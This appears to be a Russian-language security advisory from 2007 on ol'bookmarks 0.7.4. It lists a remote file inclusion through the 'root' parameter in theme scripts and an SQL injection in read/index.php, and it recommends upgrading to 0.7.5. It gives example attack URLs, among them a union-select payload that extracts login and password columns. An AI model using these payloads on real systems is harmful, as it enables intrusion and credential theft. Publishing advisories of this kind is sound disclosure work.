Несколько уязвимостей в ol'bookmarks

Дата публикации:
24.05.2007
Дата изменения:
30.09.2008
Всего просмотров:
2251
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2007-2816
CVE-2007-2817
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ol'bookmarks 0.x
Уязвимые версии: ol'bookmarks 0.7.4, возможно более ранние версии.

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю получит доступ к важным данным и скомпрометировать целевую систему

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "root" в сценариях blackorange.php, default.php, frames1_center.php, frames1_left.php, frames1.php, frames1_top.php, test1.php, test2.php, test3.php, test4.php, test5.php и test6.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/olbookmarks-0.7.4/themes/test1.php?root=[file]
http://[host]/path/themes/blackorange.php?root=[file]
http://[host]/path/theme/default.php?root=[file]
http://[host]/path/theme/frames1.php?root=[file]
http://[host]/path/theme/frames1_top.php?root=[file]
http://[host]/path/theme/test1.php?root=[file]
http://[host]/path/theme/test2.php?root=[file]
http://[host]/path/theme/test3.php?root=[file]
http://[host]/path/theme/test4.php?root=[file]
http://[host]/path/theme/test5.php?root=[file]
http://[host]/path/theme/test6.php?root=[file]
http://[host]/path/theme/frames1_left.php?root=[file]
http://[host]/path/theme/frames1_center.php?root=[file]

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии read/index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/read/index.php?name=alex&id=-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*

URL производителя: olbookmarks.sourceforge.net

Решение: Установите последнюю версию 0.7.5 с сайта производителя.

или введите имя

CAPTCHA